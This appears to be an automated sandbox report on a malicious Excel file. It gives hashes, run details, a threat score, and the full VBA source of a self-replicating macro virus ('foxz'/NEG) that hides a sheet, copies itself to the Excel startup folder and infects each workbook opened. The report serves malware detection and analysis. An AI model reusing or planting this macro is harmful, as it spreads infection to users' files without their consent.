Behavioral task
behavioral1
Sample
9d79dad075010470e7714436f2829a66.xls
Resource
win7-20230220-en
windows7-x64
7 signatures
150 seconds
Behavioral task
behavioral2
Sample
9d79dad075010470e7714436f2829a66.xls
Resource
win10v2004-20230220-en
windows10-2004-x64
5 signatures
150 seconds
General
-
Target
9d79dad075010470e7714436f2829a66
-
Size
290KB
-
MD5
9d79dad075010470e7714436f2829a66
-
SHA1
66881f49683b71e773c422981dcb3c58f965202a
-
SHA256
37f61f63629f01633165af6d5511c23849260fea49ea63ee949f70820fcb451f
-
SHA512
3e9329ea8f510108d9eb01dd04027009bb51249e4d7d96461993e60f716d749a8ebb272a220206564e77a4bee534a38b28e869ba294f7ec425f84cff56bda540
-
SSDEEP
6144:Ck3hbdlylKsgqopeJBWhZFVE+ldZ4AacEcK5pKh8ib3j2vij+L3ft8etr0a5M7ci:0cS5p+b3jSA+LV3rTM+BFJk
Score
8/10
Malware Config
Signatures
-
resource sample
Files
-
9d79dad075010470e7714436f2829a66.xls windows office2003
foxz
1Attribute VB_Name = "foxz"23'donwload NEG!!! NoMercyExcelGenerator form NoMercyPage!4'foxz@usa.net567Sub auto_open()8Attribute auto_open.VB_Description = "\n\n \n\n\n�\n\n\n \n\n\n\n"9Application.OnSheetActivate = "check_files"10End Sub1112Sub check_files()13Attribute check_files.VB_Description = "\n\n \n\n\n�\n\n\n \n\n\n\n"14c$ = Application.StartupPath15m$ = Dir(c$ & "\" & "NEGS.XLS")16If m$ = "NEGS.XLS" Then p = 1 Else p = 017If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 018whichfile = p + w * 101920Select Case whichfile21Case 1022Application.ScreenUpdating = False23n4$ = ActiveWorkbook.Name24Sheets("foxz").Visible = True25Sheets("foxz").Select26Sheets("foxz").Copy27With ActiveWorkbook28.title = ""29.Subject = ""30.Author = ""31.Keywords = ""32.Comments = "infected by NEG Promo!"33End With34newname$ = ActiveWorkbook.Name35c4$ = CurDir()36ChDir Application.StartupPath37ActiveWindow.Visible = False38Workbooks(newname$).SaveAs FileName:=Application.StartupPath & "/" & "NEGS.XLS", FileFormat:=xlNormal _39, Password:="", WriteResPassword:="", ReadOnlyRecommended:= _40False, CreateBackup:=False41ChDir c4$42Workbooks(n4$).Sheets("foxz").Visible = False43Application.OnSheetActivate = ""44Application.ScreenUpdating = True45Application.OnSheetActivate = "NEGS.XLS!check_files"46Case 147Application.ScreenUpdating = False48n4$ = ActiveWorkbook.Name49p4$ = ActiveWorkbook.Path50s$ = Workbooks(n4$).Sheets(1).Name51If s$ <> "foxz" Then52Workbooks("NEGS.XLS").Sheets("foxz").Copy before:=Workbooks(n4$).Sheets(1)53Workbooks(n4$).Sheets("foxz").Visible = False54Else55End If56Application.OnSheetActivate = ""57Application.ScreenUpdating = True58Application.OnSheetActivate = "NEGS.XLS!check_files"59Case Else60End Select61End Sub62